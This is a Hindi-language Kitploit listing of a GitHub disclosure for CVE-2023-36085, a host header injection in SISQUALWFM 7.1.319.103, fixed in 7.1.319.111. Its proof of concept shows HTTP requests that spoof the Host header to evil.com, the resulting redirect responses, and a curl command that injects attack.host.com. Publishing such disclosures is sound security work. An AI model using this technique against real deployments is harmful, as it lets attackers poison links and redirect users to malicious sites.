Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — इस रिपॉजिटरी में CVE-2023-36085 से संबंधित जानकारी है, जो SISQUALWFM संस्करण 7.1.319.103 में खोजी गई एक होस्ट हेडर इंजेक्शन भेद्यता है, जो एक हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 सौंपा गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक किया गया है। | Kitploit
उपकरण/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

इस रिपॉजिटरी में CVE-2023-36085 से संबंधित जानकारी है, जो SISQUALWFM संस्करण 7.1.319.103 में खोजी गई एक होस्ट हेडर इंजेक्शन भेद्यता है, जो एक हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 सौंपा गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक किया गया है।

साझा करें

CVE-2023-36085 SISQUALWFM होस्ट हेडर इंजेक्शन भेद्यता

यह रिपॉजिटरी SISQUALWFM संस्करण 7.1.319.103 में खोजी गई होस्ट हेडर इंजेक्शन भेद्यता से संबंधित जानकारी प्रदान करती है, जो हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी दुर्भावनापूर्ण साइट पर रीडायरेक्ट करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 निर्दिष्ट किया गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक कर दिया गया है।

भेद्यता विवरण

  • एक्सप्लॉइट शीर्षक: SISQUALWFM 7.1.319.103 होस्ट हेडर इंजेक्शन
  • खोज की तिथि: 17/03/2023
  • रिपोर्ट की तिथि: 17/03/2023
  • समाधान की तिथि: 13/10/2023
  • एक्सप्लॉइट लेखक: Omer Shaik (unknown_exploit)
  • विक्रेता होमपेज: SISQUALWFM
  • संस्करण: 7.1.319.103
  • परीक्षण किया गया: SISQUAL WFM 7.1.319.103
  • प्रभावित संस्करण: SISQUALWFM 7.1.319.103
  • ठीक किया गया संस्करण: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • CVSS स्कोर: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • श्रेणी: वेब एप्लिकेशन

प्रमाण की अवधारणा

हम एक प्रूफ-ऑफ-कॉन्सेप्ट परिदृश्य प्रदान करते हैं जो होस्ट हेडर इंजेक्शन भेद्यता का प्रदर्शन करता है, विशेष रूप से /sisqualIdentityServer/core एंडपॉइंट को लक्षित करता है। यह भेद्यता हमलावर को होस्ट हेडर के साथ छेड़छाड़ करके वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी अन्य साइट पर रीडायरेक्ट करने की अनुमति देती है।

मूल अनुरोध

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

मूल प्रतिक्रिया

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

इंटरसेप्ट किया गया अनुरोध (evil.com पर रीडायरेक्ट करने के लिए संशोधित)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

प्रतिक्रिया

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Exploit Execution

हमला करने की विधि

इस भेद्यता का शोषण करने के लिए, एक हमलावर होस्ट हेडर को संशोधित करने के लिए निम्नलिखित curl कमांड का उपयोग कर सकता है:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

अस्वीकरण

यह रिपॉजिटरी केवल सूचनात्मक उद्देश्यों के लिए है और इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए। भेद्यता को जिम्मेदारीपूर्वक विक्रेता को सूचित किया गया है, और समस्या का समाधान कर दिया गया है। भेद्यताओं की पहचान और रिपोर्ट करते समय नैतिक हैकिंग दिशानिर्देशों का पालन करना और जिम्मेदार प्रकटीकरण प्रथाओं का सम्मान करना महत्वपूर्ण है।

टूल डाउनलोड करें